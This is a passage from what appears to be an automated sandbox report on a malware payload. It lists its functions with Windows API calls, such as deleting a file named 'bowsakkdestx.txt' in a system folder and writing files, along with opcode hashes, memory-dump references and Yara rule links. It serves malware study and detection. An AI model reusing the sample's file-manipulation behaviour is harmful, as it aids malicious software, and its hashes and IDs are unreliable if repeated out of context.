                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClassCursorLoadRegister
                                                                                                                                                                        • String ID: 0$LPCWSTRszWindowClass
                                                                                                                                                                        • API String ID: 1693014935-1496217519
                                                                                                                                                                        • Opcode ID: 84aacffac1a8df2aea0ebb7d5fd4aabf5f6f0f7633e6a054626d1a3eef7ab87d
                                                                                                                                                                        • Instruction ID: a66585d87373e40ed7d4c2e5ccf6c5e305c8d2d631b909b7beefe8d240710b60
                                                                                                                                                                        • Opcode Fuzzy Hash: 84aacffac1a8df2aea0ebb7d5fd4aabf5f6f0f7633e6a054626d1a3eef7ab87d
                                                                                                                                                                        • Instruction Fuzzy Hash: 7BF0AFB4C0431C9BEF00DF90D9597DEBBB4BB08309F104149D4147A280D7BA1648CF95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00B9C438
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00B9C44E
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00B9C45B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$AppendDeleteFileFolder
                                                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                                                        • API String ID: 610490371-2616962270
                                                                                                                                                                        • Opcode ID: 209f34e6997c758eb5dbe30804599a4492632f6464b46d2562c0c256250ed310
                                                                                                                                                                        • Instruction ID: 12edb67d399f989d369d2e1eef34bfbfddeb4dedb4ed328a189f612b4861e326
                                                                                                                                                                        • Opcode Fuzzy Hash: 209f34e6997c758eb5dbe30804599a4492632f6464b46d2562c0c256250ed310
                                                                                                                                                                        • Instruction Fuzzy Hash: DDE0867964031C6BEF20ABA0DDCAFDD776C9B04B02F0040E2BB44E21D1D6B0A5C48B51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9ECB0 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove_strtok
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3446180046-0
                                                                                                                                                                        • Opcode ID: a193711945419ae7d87c9eb85039fe5f517680e3a4fe23f8ac5aac85cc20606c
                                                                                                                                                                        • Instruction ID: 0f8e5852bdc5671a94cd16a0b032f8e339ccac8424889e340777d5db11df041f
                                                                                                                                                                        • Opcode Fuzzy Hash: a193711945419ae7d87c9eb85039fe5f517680e3a4fe23f8ac5aac85cc20606c
                                                                                                                                                                        • Instruction Fuzzy Hash: 4881AEB1900606DFEF24DF58C8807AABBF1FF14304F1449B9E4155B681D7B6EA54CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB2130 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2974526305-0
                                                                                                                                                                        • Opcode ID: 225b5b572bde38d8badb4302925c97bbda5b3bc979f66d9100de26b3352a814c
                                                                                                                                                                        • Instruction ID: 3bd418d6246d18b641cd0d476a5223d47e15a581f7caa6abdb01629d27156f6c
                                                                                                                                                                        • Opcode Fuzzy Hash: 225b5b572bde38d8badb4302925c97bbda5b3bc979f66d9100de26b3352a814c
                                                                                                                                                                        • Instruction Fuzzy Hash: 24519E31A006059BDB249FA9C880AFEB7F1EF15320F2487A9F935E62D0D7F09D509B50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BCC677 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00BCC6AD
                                                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00BCC6DB
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00BCC709
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00BCC73F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                                                        • Opcode ID: e45d806d02657e395fe81e7968242ae1d6fca2c202f607c69ee2e6c4e07ab614
                                                                                                                                                                        • Instruction ID: 53d813c410525db1d489222b011e42c57a6dcfb4b98e8c0f79bb7919bf375e9b
                                                                                                                                                                        • Opcode Fuzzy Hash: e45d806d02657e395fe81e7968242ae1d6fca2c202f607c69ee2e6c4e07ab614
                                                                                                                                                                        • Instruction Fuzzy Hash: 62319A31600246AFDB218E65C984FAA7FE9FF51350F1585AEE8698B1A0E730EC51DB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9F0E0 Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00B9F125
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00B9F198
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000), ref: 00B9F1A1
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B9F1A8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1421093161-0
                                                                                                                                                                        • Opcode ID: c08c29e063cbf3cf98d89d64e6c8a51b8664bffaec313f6bebceadb8d438f434
                                                                                                                                                                        • Instruction ID: 6dbd3bc2c904b70c9cae9f2749044ff2fad1d28e442d798133a00d4cf0393011
                                                                                                                                                                        • Opcode Fuzzy Hash: c08c29e063cbf3cf98d89d64e6c8a51b8664bffaec313f6bebceadb8d438f434
                                                                                                                                                                        • Instruction Fuzzy Hash: A831E135900205EFDF149F68CC46BAE7BB8EB05715F104169F805B71C0D7756A84CBE1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00C57094 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ___BuildCatchObject.LIBCMT ref: 00C570AB
                                                                                                                                                                          • Part of subcall function 00C577A0: ___BuildCatchObjectHelper.LIBCMT ref: 00C577D2
                                                                                                                                                                          • Part of subcall function 00C577A0: ___AdjustPointer.LIBCMT ref: 00C577E9
                                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00C570C2
                                                                                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 00C570D4
                                                                                                                                                                        • CallCatchBlock.LIBCMT ref: 00C570F8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2901542994-0
                                                                                                                                                                        • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                                                        • Instruction ID: a97c5d7d6a40113ad42420a7ef4366fbfe9c1c0a285ac9992c4bd5b0ba12654c
                                                                                                                                                                        • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                                                        • Instruction Fuzzy Hash: 70011336000108BBCF12AF55EC05EDA7BBAEF88755F148114FD1862121D372E9E5EBA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB53B3 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BB5007: __getptd_noexit.LIBCMT ref: 00BB5008
                                                                                                                                                                          • Part of subcall function 00BB5007: __amsg_exit.LIBCMT ref: 00BB5015
                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00BB5A01
                                                                                                                                                                          • Part of subcall function 00BB8C96: __calloc_impl.LIBCMT ref: 00BB8CA5
                                                                                                                                                                        • __lock.LIBCMT ref: 00BB5A37
                                                                                                                                                                        • ___addlocaleref.LIBCMT ref: 00BB5A43
                                                                                                                                                                        • __lock.LIBCMT ref: 00BB5A57
                                                                                                                                                                          • Part of subcall function 00BB5208: __getptd_noexit.LIBCMT ref: 00BB5208
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2580527540-0
                                                                                                                                                                        • Opcode ID: 0ac1be03ac9beaba37d23dcc7373d329c887fcbf0c8913e0df4d24250ef2e078
                                                                                                                                                                        • Instruction ID: 9f35efe768c9a143698d04fae872cf857383e7f4dbaac62cf369f789abd032f6
                                                                                                                                                                        • Opcode Fuzzy Hash: 0ac1be03ac9beaba37d23dcc7373d329c887fcbf0c8913e0df4d24250ef2e078
                                                                                                                                                                        • Instruction Fuzzy Hash: B1014C71541B00DFE731FFA88446BAD7BE4AF45720F2042C9F4A5AB2C2CEF45941CA66
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD09B9 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                                                        • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                                        • Instruction ID: 86bc758df66e70b29581eacb04a4d506c06b20533931aaece1396c88c179fdae
                                                                                                                                                                        • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                                        • Instruction Fuzzy Hash: DF01423241014EBBCF126E94CC419ED7FA2FB29354F548496FA1958231E236C9B1AB81
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA27A0 Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 00BA27B9
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BA27C3
                                                                                                                                                                          • Part of subcall function 00BB0C62: __FF_MSGBANNER.LIBCMT ref: 00BB0C79
                                                                                                                                                                          • Part of subcall function 00BB0C62: __NMSG_WRITE.LIBCMT ref: 00BB0C80
                                                                                                                                                                          • Part of subcall function 00BB0C62: RtlAllocateHeap.NTDLL(00DB0000,00000000,00000001,?,?,?,?,00BB3B69,?), ref: 00BB0CA5
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA27CE
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 00BA27E4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2824100046-0
                                                                                                                                                                        • Opcode ID: 3d9dcaad5f8e4261795bcea76ca99668f9772f2743072d2b2585248bbbc150a3
                                                                                                                                                                        • Instruction ID: 445921e414d7541ce6a20c3567e08029c2da0256dbf48c2bc3843144633dbffb
                                                                                                                                                                        • Opcode Fuzzy Hash: 3d9dcaad5f8e4261795bcea76ca99668f9772f2743072d2b2585248bbbc150a3
                                                                                                                                                                        • Instruction Fuzzy Hash: 70F02735701304BFE7206A659C8AFBB7ADDEBC6761F100165B604F32C1EAA16D0152F1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA2800 Relevance: 6.0, APIs: 4, Instructions: 28stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 00BA2806
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BA2814
                                                                                                                                                                          • Part of subcall function 00BB0C62: __FF_MSGBANNER.LIBCMT ref: 00BB0C79
                                                                                                                                                                          • Part of subcall function 00BB0C62: __NMSG_WRITE.LIBCMT ref: 00BB0C80
                                                                                                                                                                          • Part of subcall function 00BB0C62: RtlAllocateHeap.NTDLL(00DB0000,00000000,00000001,?,?,?,?,00BB3B69,?), ref: 00BB0CA5
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA281F
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00BA2832
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2824100046-0
                                                                                                                                                                        • Opcode ID: f34d7beaba954fe784c15103568276d2e5cb28271367e0561eef23a3f864c028
                                                                                                                                                                        • Instruction ID: 96f683d75dd3ea213c532f80157fa295b80504112c23f64960666895dab6705c
                                                                                                                                                                        • Opcode Fuzzy Hash: f34d7beaba954fe784c15103568276d2e5cb28271367e0561eef23a3f864c028
                                                                                                                                                                        • Instruction Fuzzy Hash: 82E08C7A3016247FE51027596C8AFBF6A5CCBC27B6F100252F611E22E2CAE05C0281B0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA4920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
